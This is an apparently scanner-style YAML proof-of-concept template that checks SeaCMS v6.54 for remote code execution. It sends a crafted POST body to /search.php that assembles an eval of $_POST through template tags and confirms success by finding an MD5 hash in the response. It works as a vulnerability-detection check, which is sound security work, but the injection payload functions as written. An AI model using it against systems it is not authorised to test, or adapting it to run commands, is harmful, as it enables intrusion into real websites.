name: poc-yaml-seacms-v654-rce
set:
  rand: randomInt(2000000000, 2100000000)
rules:
  - method: POST
    path: /search.php
    body: >-
      searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=prin&9[]=tf(md5({{rand}}));
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
  links:
    - http://0day5.com/archives/4249/
    - https://phyb0x.github.io/2018/10/09/seacms%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90/